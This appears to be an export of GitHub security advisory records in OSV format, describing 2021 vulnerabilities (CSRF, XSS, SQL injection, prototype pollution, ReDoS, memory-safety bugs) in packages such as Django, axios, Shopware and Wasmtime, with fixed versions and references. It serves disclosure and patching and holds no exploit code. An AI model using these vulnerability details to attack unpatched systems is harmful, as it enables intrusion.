1.4.0 | GHSA-gjwp-7v3g-99pj | 2021-08-25T18:00:40Z | 2021-09-02T17:09:05Z | null | ['CVE-2021-23431'] | Cross-site Request Forgery (CSRF) in joplin | The package joplin before 2.3.2 are vulnerable to Cross-site Request Forgery (CSRF) due to missing CSRF checks in various forms. | [{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N'}] | [{'package': {'ecosystem': 'npm', 'name': 'joplin'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.3.2'}]}]}] | [{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-23431'}, {'type': 'WEB', 'url': 'https://github.com/laurent22/joplin/commit/19b45de2981c09f6f387498ef96d32b4811eba5e'}, {'type': 'PACKAGE', 'url': 'https://github.com/laurent22/joplin'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/SNYK-JS-JOPLIN-1325537'}] | {'cwe_ids': ['CWE-352'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-08-25T18:00:40Z', 'nvd_published_at': '2021-08-24T08:15:00Z'} |
1.4.0 | GHSA-2p89-5f22-8qvf | 2021-06-25T15:29:10Z | 2021-09-08T18:00:32Z | null | ['CVE-2021-32711'] | Exposure of Sensitive Information to an Unauthorized Actor | Shopware is an open source eCommerce platform. Versions prior to 6.3.5.1 may leak of information via Store-API. The vulnerability could only be fixed by changing the API system, which involves a non-backward-compatible change. Only consumers of the Store-API should be affected by this change. We recommend to update to the current version 6.3.5.1. You can get the update to 6.3.5.1 regularly via the Auto-Updater or directly via the download overview. https://www.shopware.com/en/download/#shopware-6 The vulnerability could only be fixed by changing the API system, which involves a non-backward-compatible change. Only consumers of the Store-API should be affected by this change. Please check your plugins if you have it in use. Detailed technical information can be found in the upgrade information. https://github.com/shopware/platform/blob/v6.3.5.1/UPGRADE-6.3.md#6351 ### Workarounds For older versions of 6.1 and 6.2, corresponding security measures are also available via a plugin. For the full range of functions, we recommend updating to the latest Shopware version. https://store.shopware.com/en/detail/index/sArticle/518463/number/Swag136939272659 ### For more information https://docs.shopware.com/en/shopware-6-en/security-updates/security-update-02-2021 | [{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N'}] | [{'package': {'ecosystem': 'Packagist', 'name': 'shopware/platform'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '6.3.5.1'}]}], 'database_specific': {'last_known_affected_version_range': '<= 6.3.5.0'}}] | [{'type': 'WEB', 'url': 'https://github.com/shopware/platform/security/advisories/GHSA-f2vv-h5x4-57gr'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-32711'}, {'type': 'WEB', 'url': 'https://github.com/shopware/platform/commit/157fb84a8b3b4ace4be165a033d559826704829b'}, {'type': 'WEB', 'url': 'https://docs.shopware.com/en/shopware-6-en/security-updates/security-update-02-2021'}] | {'cwe_ids': ['CWE-200'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2021-06-25T15:29:10Z', 'nvd_published_at': '2021-06-24T20:15:00Z'} |
1.4.0 | GHSA-c7vg-w8q8-c3wf | 2021-06-25T15:35:07Z | 2021-09-08T18:00:20Z | null | ['CVE-2021-32710'] | Session Fixation | Shopware is an open source eCommerce platform. Potential session hijacking of store customers in versions below 6.3.5.2. We recommend to update to the current version 6.3.5.2. You can get the update to 6.3.5.2 regularly via the Auto-Updater or directly via the download overview. For older versions of 6.1 and 6.2, corresponding security measures are also available via a plugin. For the full range of functions, we recommend updating to the latest Shopware version. | [{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N'}] | [{'package': {'ecosystem': 'Packagist', 'name': 'shopware/platform'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '6.3.5.2'}]}], 'database_specific': {'last_known_affected_version_range': '<= 6.3.5.1'}}] | [{'type': 'WEB', 'url': 'https://github.com/shopware/platform/security/advisories/GHSA-h9q8-5gv2-v6mg'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-32710'}, {'type': 'WEB', 'url': 'https://github.com/shopware/platform/commit/010c0154bea57c1fca73277c7431d029db7a972e'}] | {'cwe_ids': ['CWE-384'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-06-25T15:35:07Z', 'nvd_published_at': '2021-06-24T20:15:00Z'} |
1.4.0 | GHSA-hxj6-v58r-cqv3 | 2021-08-30T21:28:33Z | 2021-09-01T18:31:45Z | null | ['CVE-2020-22392'] | Cross Site Scripting in Subrion CMS | Cross Site Scripting (XSS) vulnerability exists in Subrion CMS 4.2.2 when adding a blog and then editing an image file. | [{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N'}] | [{'package': {'ecosystem': 'Packagist', 'name': 'intelliants/subrion'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '4.2.1'}]}]}] | [{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-22392'}, {'type': 'WEB', 'url': 'https://github.com/intelliants/subrion/issues/868'}, {'type': 'PACKAGE', 'url': 'https://github.com/intelliants/subrion'}] | {'cwe_ids': ['CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-08-30T21:28:33Z', 'nvd_published_at': '2021-08-05T22:15:00Z'} |
1.4.0 | GHSA-xpfp-f569-q3p2 | 2021-08-25T22:24:11Z | 2021-09-22T17:34:49Z | null | ['CVE-2021-35042'] | SQL Injection in Django | Django 3.1.x before 3.1.13 and 3.2.x before 3.2.5 allows QuerySet.order_by SQL injection if order_by is untrusted input from a client of a web application. | [{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}] | [{'package': {'ecosystem': 'PyPI', 'name': 'Django'}, 'ecosystem_specific': {'affected_functions': ['django.db.models.query.QuerySet.order_by']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '3.2.0'}, {'fixed': '3.2.5'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'Django'}, 'ecosystem_specific': {'affected_functions': ['django.db.models.query.QuerySet.order_by']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '3.0.0'}, {'fixed': '3.1.13'}]}]}] | [{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-35042'}, {'type': 'WEB', 'url': 'https://github.com/django/django/commit/0bd57a879a0d54920bb9038a732645fb917040e9'}, {'type': 'WEB', 'url': 'https://github.com/django/django/commit/a34a5f724c5d5adb2109374ba3989ebb7b11f81f'}, {'type': 'WEB', 'url': 'https://docs.djangoproject.com/en/3.2/releases/security/'}, {'type': 'PACKAGE', 'url': 'https://github.com/django/django'}, {'type': 'WEB', 'url': 'https://groups.google.com/forum/#!forum/django-announce'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/SS6NJTBYWOX6J7G4U3LUOILARJKWPQ5Y/'}, {'type': 'WEB', 'url': 'https://security.netapp.com/advisory/ntap-20210805-0008/'}, {'type': 'WEB', 'url': 'https://www.djangoproject.com/weblog/2021/jul/01/security-releases/'}, {'type': 'WEB', 'url': 'https://www.openwall.com/lists/oss-security/2021/07/02/2'}] | {'cwe_ids': ['CWE-89'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2021-07-03T00:06:31Z', 'nvd_published_at': '2021-07-02T10:15:00Z'} |
1.4.0 | GHSA-84p7-fh9c-6g8h | 2021-09-16T21:30:18Z | 2021-09-20T19:52:24Z | null | [] | Prototype Pollution in mixme | ### Impact
When copying properties from a source object to a target object, the target object can gain access to certain properties of the source object and modify their content.
### Patches
The problem was patch with a more agressive discovery of secured properties to filter out.
| [] | [{'package': {'ecosystem': 'npm', 'name': 'mixme'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.5.2'}]}]}] | [{'type': 'WEB', 'url': 'https://github.com/adaltas/node-mixme/security/advisories/GHSA-84p7-fh9c-6g8h'}, {'type': 'WEB', 'url': 'https://github.com/adaltas/node-mixme/issues/1'}, {'type': 'WEB', 'url': 'https://github.com/adaltas/node-mixme/issues/2'}, {'type': 'WEB', 'url': 'https://github.com/adaltas/node-mixme/commit/db70fe9bcbba451e9f8bd794a9fa7cdfa00125ad'}, {'type': 'PACKAGE', 'url': 'https://github.com/adaltas/node-mixme'}, {'type': 'ADVISORY', 'url': 'https://github.com/advisories/GHSA-79jw-6wg7-r9g4'}] | {'cwe_ids': ['CWE-1321'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-09-16T21:30:18Z', 'nvd_published_at': None} |
1.4.0 | GHSA-cqqh-49mx-fq63 | 2022-08-10T23:45:09Z | 2021-09-13T20:16:54Z | null | ['CVE-2021-3645'] | merge vulnerable to Prototype Pollution | merge is vulnerable to Improperly Controlled Modification of Object Prototype Attributes ('Prototype Pollution') | [{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}] | [{'package': {'ecosystem': 'npm', 'name': '@viking04/merge'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.0.2'}]}]}] | [{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-3645'}, {'type': 'WEB', 'url': 'https://github.com/viking04/merge/commit/baba40332080b38b33840d2614df6d4142dedaf6'}, {'type': 'PACKAGE', 'url': 'https://github.com/viking04/merge'}, {'type': 'WEB', 'url': 'https://huntr.dev/bounties/ef387a9e-ca3c-4c21-80e3-d34a6a896262'}] | {'cwe_ids': ['CWE-1321', 'CWE-915'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2021-09-13T19:14:06Z', 'nvd_published_at': '2021-09-10T11:15:00Z'} |
1.4.0 | GHSA-q4h9-46xg-m3x9 | 2021-09-14T22:17:40Z | 2021-09-15T20:22:13Z | null | [] | UUPSUpgradeable vulnerability in @openzeppelin/contracts-upgradeable | ### Impact
Upgradeable contracts using `UUPSUpgradeable` may be vulnerable to an attack affecting uninitialized implementation contracts. We will update this advisory with more information soon.
### Patches
A fix is included in version 4.3.2 of `@openzeppelin/contracts` and `@openzeppelin/contracts-upgradeable`.
### Workarounds
Initialize implementation contracts using `UUPSUpgradeable` by invoking the initializer function (usually called `initialize`). An example is provided [in the forum](https://forum.openzeppelin.com/t/security-advisory-initialize-uups-implementation-contracts/15301).
### References
A post-mortem will be published in a few days in the [OpenZeppelin Forum](https://forum.openzeppelin.com/).
### For more information
If you have any questions or comments about this advisory, or need assistance executing the mitigation, email us at security@openzeppelin.com. | [] | [{'package': {'ecosystem': 'npm', 'name': '@openzeppelin/contracts-upgradeable'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '4.1.0'}, {'fixed': '4.3.2'}]}]}] | [{'type': 'WEB', 'url': 'https://github.com/OpenZeppelin/openzeppelin-contracts-upgradeable/security/advisories/GHSA-q4h9-46xg-m3x9'}, {'type': 'PACKAGE', 'url': 'https://github.com/OpenZeppelin/openzeppelin-contracts-upgradeable'}] | {'cwe_ids': [], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2021-09-14T22:17:40Z', 'nvd_published_at': None} |
1.4.0 | GHSA-cph5-m8f7-6c5x | 2022-09-14T21:28:32Z | 2021-09-01T18:23:02Z | null | ['CVE-2021-3749'] | axios Inefficient Regular Expression Complexity vulnerability | axios before v0.21.2 is vulnerable to Inefficient Regular Expression Complexity. | [{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H'}] | [{'package': {'ecosystem': 'npm', 'name': 'axios'}, 'ecosystem_specific': {'affected_functions': ['axios.utils.trim']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.21.2'}]}]}] | [{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-3749'}, {'type': 'WEB', 'url': 'https://github.com/axios/axios/commit/5b457116e31db0e88fede6c428e969e87f290929'}, {'type': 'WEB', 'url': 'https://cert-portal.siemens.com/productcert/pdf/ssa-637483.pdf'}, {'type': 'PACKAGE', 'url': 'https://github.com/axios/axios'}, {'type': 'WEB', 'url': 'https://huntr.dev/bounties/1e8f07fc-c384-4ff9-8498-0690de2e8c31'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r075d464dce95cd13c03ff9384658edcccd5ab2983b82bfc72b62bb10@%3Ccommits.druid.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r216f0fd0a3833856d6a6a1fada488cadba45f447d87010024328ccf2@%3Ccommits.druid.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r3ae6d2654f92c5851bdb73b35e96b0e4e3da39f28ac7a1b15ae3aab8@%3Ccommits.druid.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r4bf1b32983f50be00f9752214c1b53738b621be1c2b0dbd68c7f2391@%3Ccommits.druid.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r7324ecc35b8027a51cb6ed629490fcd3b2d7cf01c424746ed5744bf1@%3Ccommits.druid.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r74d0b359408fff31f87445261f0ee13bdfcac7d66f6b8e846face321@%3Ccommits.druid.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/ra15d63c54dc6474b29f72ae4324bcb03038758545b3ab800845de7a1@%3Ccommits.druid.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rc263bfc5b53afcb7e849605478d73f5556eb0c00d1f912084e407289@%3Ccommits.druid.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rfa094029c959da0f7c8cd7dc9c4e59d21b03457bf0cedf6c93e1bb0a@%3Cdev.druid.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rfc5c478053ff808671aef170f3d9fc9d05cc1fab8fb64431edc66103@%3Ccommits.druid.apache.org%3E'}, {'type': 'WEB', 'url': 'https://www.npmjs.com/package/axios'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpujul2022.html'}] | {'cwe_ids': ['CWE-1333', 'CWE-400'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-09-01T18:14:02Z', 'nvd_published_at': '2021-08-31T11:15:00Z'} |
1.4.0 | GHSA-6whf-q6p5-84wg | 2021-10-06T13:23:34Z | 2021-09-29T17:16:07Z | null | ['CVE-2021-38299'] | Improper Access Control in Webauthn Framework | Webauthn Framework 3.3.x before 3.3.4 has Incorrect Access Control. An attacker that controls a user's system is able to login to a vulnerable service using an attached FIDO2 authenticator without passing a check of the user presence. | [{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}] | [{'package': {'ecosystem': 'Packagist', 'name': 'web-auth/webauthn-framework'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '3.3.0'}, {'fixed': '3.3.4'}]}]}] | [{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-38299'}, {'type': 'WEB', 'url': 'https://github.com/web-auth/webauthn-framework/commit/572e239c5702667ca52487faf861abc768a46308'}, {'type': 'PACKAGE', 'url': 'https://github.com/web-auth/webauthn-framework'}, {'type': 'WEB', 'url': 'https://github.com/web-auth/webauthn-framework/releases'}, {'type': 'WEB', 'url': 'https://github.com/web-auth/webauthn-framework/releases/tag/v3.3.4'}, {'type': 'WEB', 'url': 'https://www.fzi.de/en/news/news/detail-en/artikel/fsa-2021-1-fehlende-ueberpruefung-von-user-presence-in-webauthn-framework/'}] | {'cwe_ids': ['CWE-863'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2021-09-28T21:04:00Z', 'nvd_published_at': '2021-09-27T06:15:00Z'} |
1.4.0 | GHSA-2r2w-jrh2-p4gr | 2023-09-19T10:09:11Z | 2021-09-09T17:08:55Z | null | ['CVE-2021-31274'] | Cross-site Scripting in LibreNMS | In LibreNMS < 21.3.0, a stored XSS vulnerability was identified in the API Access page due to insufficient sanitization of the $api->description variable. As a result, arbitrary Javascript code can get executed. | [{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N'}] | [{'package': {'ecosystem': 'Packagist', 'name': 'librenms/librenms'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '21.3.0'}]}]}] | [{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-31274'}, {'type': 'WEB', 'url': 'https://github.com/librenms/librenms/pull/12739'}, {'type': 'WEB', 'url': 'https://community.librenms.org/t/vulnerability-report-cross-site-scripting-xss-in-the-api-access-page/15431'}, {'type': 'WEB', 'url': 'https://github.com/librenms/librenms'}, {'type': 'PACKAGE', 'url': 'https://github.com/librenms/librenms/'}] | {'cwe_ids': ['CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-09-09T13:32:48Z', 'nvd_published_at': '2021-09-08T18:15:00Z'} |
1.4.0 | GHSA-g452-6rfc-vrvx | 2021-08-30T21:26:46Z | 2021-09-01T18:31:53Z | null | ['CVE-2021-23419'] | Prototype Pollution in open-graph | This affects the package open-graph before 0.2.6. The function parse could be tricked into adding or modifying properties of Object.prototype using a __proto__ or constructor payload. | [{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N'}] | [{'package': {'ecosystem': 'npm', 'name': 'open-graph'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.2.6'}]}]}] | [{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-23419'}, {'type': 'WEB', 'url': 'https://github.com/samholmes/node-open-graph/commit/a0cef507a90adaac7dbbe9c404f09a50bdefb348'}, {'type': 'PACKAGE', 'url': 'https://github.com/samholmes/node-open-graph'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/SNYK-JS-OPENGRAPH-1536747'}] | {'cwe_ids': ['CWE-1321', 'CWE-915'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-08-30T21:26:31Z', 'nvd_published_at': '2021-08-08T08:15:00Z'} |
1.4.0 | GHSA-7pr3-p5fm-8r9x | 2021-09-30T16:43:12Z | 2021-09-30T17:09:47Z | null | ['CVE-2021-41109'] | LiveQuery publishes user session tokens in parse-server | ### Impact
For regular (non-LiveQuery) queries, the session token is removed from the response, but for LiveQuery payloads it is currently not. If a user has a LiveQuery subscription on the `Parse.User` class, all session tokens created during user sign-ups will be broadcast as part of the LiveQuery payload.
### Patches
Remove session token from LiveQuery payload.
### Workaround
Set `user.acl(new Parse.ACL())` in a beforeSave trigger to make the user private already on sign-up. | [{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N'}] | [{'package': {'ecosystem': 'npm', 'name': 'parse-server'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '4.10.4'}]}]}] | [{'type': 'WEB', 'url': 'https://github.com/parse-community/parse-server/security/advisories/GHSA-7pr3-p5fm-8r9x'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-41109'}, {'type': 'WEB', 'url': 'https://github.com/parse-community/parse-server/commit/4ac4b7f71002ed4fbedbb901db1f6ed1e9ac5559'}, {'type': 'PACKAGE', 'url': 'https://github.com/parse-community/parse-server'}, {'type': 'WEB', 'url': 'https://github.com/parse-community/parse-server/releases/tag/4.10.4'}] | {'cwe_ids': ['CWE-200'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-09-30T16:43:12Z', 'nvd_published_at': '2021-09-30T15:15:00Z'} |
1.4.0 | GHSA-w3j4-76qw-wwjm | 2021-09-08T14:47:05Z | 2021-09-07T23:08:24Z | null | ['CVE-2021-39197'] | Older releases of better_errors open to Cross-Site Request Forgery attack | ### Impact
better_errors prior to 2.8.0 did not implement CSRF protection for its internal requests. It also did not enforce the correct "Content-Type" header for these requests, which allowed a cross-origin "simple request" to be made without CORS protection. These together left an application with better_errors enabled open to cross-origin attacks.
_As a developer tool, better_errors documentation strongly recommends addition only to the `development` bundle group, so this vulnerability should only affect development environments. Please ensure that your project limits better_errors to the `development` group (or the non-Rails equivalent)._
### Patches
Starting with release 2.8.x, CSRF protection is enforced. It is recommended that you upgrade to the latest release, or minimally to "~> 2.8.3".
### Workarounds
There are no known workarounds to mitigate the risk of using older releases of better_errors.
### References
- Chris Moberly provided [an example attack that uses a now-patched vulnerability of webpack-dev-server in conjunction with Better Errors](https://about.gitlab.com/blog/2021/09/07/why-are-developers-vulnerable-to-driveby-attacks/)
### For more information
If you have any questions or comments about this advisory, please
- Add to the [discussion in better_errors](https://github.com/BetterErrors/better_errors/discussions/507)
- Open an issue in [better_errors](https://github.com/BetterErrors/better_errors)
| [{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:H/I:N/A:N'}] | [{'package': {'ecosystem': 'RubyGems', 'name': 'better_errors'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.8.0'}]}]}] | [{'type': 'WEB', 'url': 'https://github.com/BetterErrors/better_errors/security/advisories/GHSA-w3j4-76qw-wwjm'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-39197'}, {'type': 'WEB', 'url': 'https://github.com/BetterErrors/better_errors/pull/474'}, {'type': 'WEB', 'url': 'https://github.com/BetterErrors/better_errors/commit/8e8e796bfbde4aa088741823c8a3fc6df2089bb0'}, {'type': 'PACKAGE', 'url': 'https://github.com/BetterErrors/better_errors'}, {'type': 'WEB', 'url': 'https://github.com/BetterErrors/better_errors/discussions/507'}, {'type': 'WEB', 'url': 'https://github.com/rubysec/ruby-advisory-db/blob/master/gems/better_errors/CVE-2021-39197.yml'}] | {'cwe_ids': ['CWE-352'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-09-07T17:58:52Z', 'nvd_published_at': '2021-09-07T18:15:00Z'} |
1.4.0 | GHSA-87p2-cvhq-q4mv | 2021-09-13T20:32:55Z | 2021-09-07T22:56:56Z | null | ['CVE-2020-13929'] | Authentication bypass in Apache Zeppelin | Authentication bypass vulnerability in Apache Zeppelin allows an attacker to bypass Zeppelin authentication mechanism to act as another user. This issue affects Apache Zeppelin Apache Zeppelin version 0.9.0 and prior versions. | [{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N'}] | [{'package': {'ecosystem': 'Maven', 'name': 'org.apache.zeppelin:zeppelin'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.10.0'}]}]}] | [{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-13929'}, {'type': 'PACKAGE', 'url': 'https://github.com/apache/zeppelin'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r768800925d6407a6a87ccae0ec98776b7bda50c0e3ed3d0130dad028%40%3Cusers.zeppelin.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r768800925d6407a6a87ccae0ec98776b7bda50c0e3ed3d0130dad028@%3Cannounce.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r768800925d6407a6a87ccae0ec98776b7bda50c0e3ed3d0130dad028@%3Cusers.zeppelin.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r99529e175a7c1c9a26bd41a02802c8af7aa97319fe561874627eb999@%3Cusers.zeppelin.apache.org%3E'}, {'type': 'WEB', 'url': 'http://www.openwall.com/lists/oss-security/2021/09/02/2'}] | {'cwe_ids': ['CWE-287'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-09-03T20:16:12Z', 'nvd_published_at': '2021-09-02T17:15:00Z'} |
1.4.0 | GHSA-4873-36h9-wv49 | 2021-09-17T20:05:58Z | 2021-09-20T19:54:16Z | null | ['CVE-2021-39218'] | Out-of-bounds read/write and invalid free with `externref`s and GC safepoints in Wasmtime | ### Impact
There was an invalid free and out-of-bounds read and write bug when running Wasm that uses `externref`s in Wasmtime.
To trigger this bug, Wasmtime needs to be running Wasm that uses `externref`s, the host creates non-null `externrefs`, Wasmtime performs a garbage collection (GC), and there has to be a Wasm frame on the stack that is at a GC safepoint where
* there are no live references at this safepoint, and
* there is a safepoint with live references earlier in this frame's function.
Under this scenario, Wasmtime would incorrectly use the GC stack map for the safepoint from earlier in the function instead of the empty safepoint. This would result in Wasmtime treating arbitrary stack slots as `externref`s that needed to be rooted for GC. At the *next* GC, it would be determined that nothing was referencing these bogus `externref`s (because nothing could ever reference them, because they are not really `externref`s) and then Wasmtime would deallocate them and run `<ExternRef as Drop>::drop` on them. This results in a free of memory that is not necessarily on the heap (and shouldn't be freed at this moment even if it was), as well as potential out-of-bounds reads and writes.
Even though support for `externref`s (via the reference types proposal) is enabled by default, unless you are creating non-null `externref`s in your host code or explicitly triggering GCs, you cannot be affected by this bug.
We have reason to believe that the effective impact of this bug is relatively small because usage of `externref` is currently quite rare.
### Patches
This bug has been patched and users should upgrade to Wasmtime version 0.30.0.
Additionally, we have updated [our primary `externref` fuzz target](https://github.com/bytecodealliance/wasmtime/blob/37c094faf53f1b356aab3c79d451395e4f7edb34/fuzz/fuzz_targets/table_ops.rs) such that it better exercises these code paths and we can have greater confidence in their correctness going forward.
### Workarounds
If you cannot upgrade Wasmtime at this time, you can avoid this bug by disabling the reference types proposal by passing `false` to [`wasmtime::Config::wasm_reference_types`](https://docs.rs/wasmtime/0.29.0/wasmtime/struct.Config.html#method.wasm_reference_types)
### References
* [The Wasm reference types proposal, which introduces `externref`](https://github.com/WebAssembly/reference-types/)
### For more information
If you have any questions or comments about this advisory:
* Reach out to us on [the Bytecode Alliance Zulip chat](https://bytecodealliance.zulipchat.com/#narrow/stream/217126-wasmtime)
* Open an issue in [the `bytecodealliance/wasmtime` repository](https://github.com/bytecodealliance/wasmtime/) | [{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:H/A:H'}] | [{'package': {'ecosystem': 'crates.io', 'name': 'wasmtime'}, 'ecosystem_specific': {'affected_functions': ['wasmtime::Linker::func_new', 'wasmtime::Linker::func_wrap', 'wasmtime::Store::gc']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.26.0'}, {'fixed': '0.30.0'}]}]}] | [{'type': 'WEB', 'url': 'https://github.com/bytecodealliance/wasmtime/security/advisories/GHSA-4873-36h9-wv49'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-39218'}, {'type': 'WEB', 'url': 'https://github.com/bytecodealliance/wasmtime/commit/398a73f0dd862dbe703212ebae8e34036a18c11c'}, {'type': 'WEB', 'url': 'https://crates.io/crates/wasmtime'}, {'type': 'PACKAGE', 'url': 'https://github.com/bytecodealliance/wasmtime'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/WAVBRYDDUIY2ZR3K3FO4BVYJKIMJ5TP7/'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/Z2Z33FTXFQ6EOINVEQIP4DFBG53G5XIY/'}, {'type': 'WEB', 'url': 'https://rustsec.org/advisories/RUSTSEC-2021-0110.html'}] | {'cwe_ids': ['CWE-125', 'CWE-590', 'CWE-787'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-09-17T20:05:58Z', 'nvd_published_at': '2021-09-17T21:15:00Z'} |